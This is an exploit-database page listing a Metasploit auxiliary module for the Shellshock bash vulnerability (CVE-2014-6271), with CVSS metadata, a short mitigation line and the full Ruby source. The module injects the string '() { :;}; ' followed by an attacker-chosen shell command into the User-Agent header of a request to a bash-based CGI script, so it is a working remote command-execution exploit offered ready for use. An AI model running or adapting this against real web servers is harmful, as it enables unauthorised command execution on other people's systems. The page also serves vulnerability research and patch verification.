header-logo
Suggest Exploit
vendor:
N/A
by:
Stephane Chazelas, Shaun Colley
9,8
CVSS
CRITICAL
BASH-based CGI
78
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2014-6271
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-81e2b308-4a6c-11e4-b711-6805ca0b3d42/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3094/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-2380-1/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3093/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3092/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-512d1301-49b9-11e4-ae2c-c80aa9043978/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1354/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/hpsim-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/apple-osx-bash-cve-2014-6277/https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=2https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=3https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=4https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

bashedCgi

This module sends the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.

Mitigation:

Ensure that the web server is configured to use a non-bash shell for CGI scripts.
Source

Exploit-DB raw data:

    require 'msf/core'

    class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::HttpClient
    

        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'bashedCgi',
                'Description'    => %q{
                   Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. 
                },
                'Author'         => 
                  [ 
                    'Stephane Chazelas',                      # vuln discovery 
                    'Shaun Colley <scolley at ioactive.com>'  # metasploit module
                  ],
                'License'        => MSF_LICENSE,
                'References'     => [ 'CVE', '2014-6271' ],
                'Targets'        => 
                    [
                        [ 'cgi', {} ]
                    ],
                'DefaultTarget'  => 0,
                'Payload'        =>
                    {
                    'Space'      => 1024,
                    'DisableNops' => true
                    },
                'DefaultOptions' => { 'PAYLOAD' => 0 } 
            ))

                register_options(
                    [
                        OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
                        OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
                    ], self.class)
        end

        def run 
            res = send_request_cgi({
                'method'   => 'GET',
                'uri'      => datastore['TARGETURI'],
                'agent'    => "() { :;}; " + datastore['CMD']
            })

            if res && res.code == 200
                print_good("Command sent - 200 received")
            else
                print_error("Command sent - non-200 reponse")
            end
        end
    end

Navigation

Suggest Exploit

Services By CQR